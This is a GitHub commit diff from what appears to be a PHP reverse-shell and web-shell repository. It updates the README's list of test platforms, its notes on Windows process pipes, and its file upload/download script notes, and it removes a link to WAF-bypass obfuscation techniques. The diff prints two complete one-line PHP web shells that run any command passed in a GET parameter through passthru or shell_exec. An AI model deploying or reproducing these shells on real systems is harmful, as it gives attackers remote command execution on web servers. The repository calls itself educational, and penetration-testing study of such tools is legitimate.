You signed in with another tab or window. Reload to refresh your session.You signed out in another tab or window. Reload to refresh your session.You switched accounts on another tab or window. Reload to refresh your session.Dismiss alert
Copy file name to clipboardExpand all lines: README.md
+8-12Lines changed: 8 additions & 12 deletions
Display the source diff
Display the rich diff
Original file line number
Diff line number
Diff line change
@@ -6,18 +6,18 @@ Works on Linux OS and macOS with `/bin/sh` and Windows OS with `cmd.exe`. Script
6
6
7
7
Works with both, `ncat` and `multi/handler`.
8
8
9
-
Tested on XAMPP for Linux v7.3.19 (64-bit) with PHP v7.3.19 on Kali Linux v2020.2 (64-bit).
9
+
Tested on:
10
10
11
-
Tested on XAMPP for OS X v7.4.10 (64-bit) with PHP v7.4.10 on macOS Catalina v10.15.6 (64-bit).
11
+
* XAMPP for Linux v7.3.19 with PHP v7.3.19 on Kali Linux v2020.2 (64-bit),
12
+
* XAMPP for OS X v7.4.10 with PHP v7.4.10 on macOS Catalina v10.15.6 (64-bit),
13
+
* XAMPP for Windows v7.4.3 with PHP v7.4.3 on Windows 10 Enterprise OS (64-bit),
14
+
* Docker image [nouphet/docker-php4](https://hub.docker.com/r/nouphet/docker-php4) with PHP v4.4.0,
15
+
* Docker image [steeze/php52-nginx](https://hub.docker.com/r/steeze/php52-nginx) with PHP v5.2.17.
12
16
13
-
Tested on XAMPP for Windows v7.4.3 (64-bit) with PHP v7.4.3 on Windows 10 Enterprise OS (64-bit).
14
-
15
-
In addition, everything was tested on Docker images [nouphet/docker-php4](https://hub.docker.com/r/nouphet/docker-php4) with PHP v4.4.0 and [steeze/php52-nginx](https://hub.docker.com/r/steeze/php52-nginx) with PHP v5.2.17.
17
+
**Process pipes on Windows OS do not support asynchronous operations so `stream_set_blocking()`, `stream_select()`, and `feof()` will not work properly, but I found a workaround.**
16
18
17
19
Made for educational purposes. I hope it will help!
18
20
19
-
**Process pipes on Windows OS do not support asynchronous operations so `stream_set_blocking()`, `stream_select()`, and `feof()` will not work properly, but I found a workaround.**
20
-
21
21
## Table of Contents
22
22
23
23
*[Reverse Shells](#reverse-shells)
@@ -48,15 +48,11 @@ Check the [simple PHP web shell](https://github.com/ivan-sincek/php-reverse-shel
48
48
49
49
Check the [simple PHP web shell v2](https://github.com/ivan-sincek/php-reverse-shell/blob/master/src/web/simple_php_web_shell_get_v2.php) based on HTTP GET request. You must [URL encode](https://www.urlencoder.org) your commands.
50
50
51
-
Find out more about PHP obfuscation techniques for old versions of PHP at [lcatro/PHP-WebShell-Bypass-WAF](https://github.com/lcatro/PHP-WebShell-Bypass-WAF). Credits to the author!
52
-
53
51
## File Upload/Download Script
54
52
55
53
Check the [simple PHP file upload/download script](https://github.com/ivan-sincek/php-reverse-shell/blob/master/src/web/files.php) based on HTTP POST request for file upload and HTTP GET request for file download.
56
54
57
-
When downloading a file, you must [URL encode](https://www.urlencoder.org) the file path, and don't forget to specify the output file if using cURL.
58
-
59
-
When uploading a file, don't forget to specify `@` before the file path.
55
+
When downloading a file, you must [URL encode](https://www.urlencoder.org) the file path.
60
56
61
57
Depending on the server configuration, downloading a file through HTTP GET request parameter might not always work, instead, you will have to hardcore the file path in the script.
<?phpheader('Content-Type: text/plain; charset=UTF-8');$p='command';if(isset($_SERVER['REQUEST_METHOD'])&&strtolower($_SERVER['REQUEST_METHOD'])==='get'&&isset($_GET[$p])&&($_GET[$p]=trim($_GET[$p]))&&strlen($_GET[$p])>0){if(@passthru("($_GET[$p]) 2>&1")===false){echo'ERROR: The function might be disabled.';}unset($_GET[$p]);/*@gc_collect_cycles();*/} ?>
1
+
<?phpheader('Content-Type: text/plain; charset=UTF-8');$p='command';if(isset($_SERVER['REQUEST_METHOD'])&&strtolower($_SERVER['REQUEST_METHOD'])==='get'&&isset($_GET[$p])&&($_GET[$p]=trim($_GET[$p]))&&strlen($_GET[$p])>0){if(@passthru("($_GET[$p]) 2>&1")===false){echo'ERROR: The method might be disabled';}unset($_GET[$p]);/*@gc_collect_cycles();*/} ?>
<?php$p='command';$o=null;if(isset($_SERVER['REQUEST_METHOD'])&&strtolower($_SERVER['REQUEST_METHOD'])==='get'&&isset($_GET[$p])&&($_GET[$p]=trim($_GET[$p]))&&strlen($_GET[$p])>0){$o=@shell_exec("($_GET[$p]) 2>&1");if($o===false){$o='ERROR: The function might be disabled.';}else{$o=str_replace('<','<',$o);$o=str_replace('>','>',$o);}/*echo "<pre>{$o}</pre>";unset($o);unset($_GET[$p]);/*@gc_collect_cycles();*/}?><!DOCTYPE html><html lang="en"><head><meta charset="UTF-8"><title>Simple PHP Web Shell</title><meta name="author" content="Ivan Šincek"><meta name="viewport" content="width=device-width, initial-scale=1.0"></head><body><pre><?phpecho$o;unset($o);unset($_GET[$p]);/*@gc_collect_cycles();*/?></pre></body></html>
1
+
<?php$p='command';$o=null;if(isset($_SERVER['REQUEST_METHOD'])&&strtolower($_SERVER['REQUEST_METHOD'])==='get'&&isset($_GET[$p])&&($_GET[$p]=trim($_GET[$p]))&&strlen($_GET[$p])>0){$o=@shell_exec("($_GET[$p]) 2>&1");if($o===false){$o='ERROR: The method might be disabled';}else{$o=str_replace('<','<',$o);$o=str_replace('>','>',$o);}}?><!DOCTYPE html><html lang="en"><head><meta charset="UTF-8"><title>Simple PHP Web Shell</title><meta name="author" content="Ivan Šincek"><meta name="viewport" content="width=device-width, initial-scale=1.0"></head><body><pre><?phpecho$o;?></pre></body></html><?phpunset($o);unset($_GET[$p]);/*@gc_collect_cycles();*/?>
0 commit comments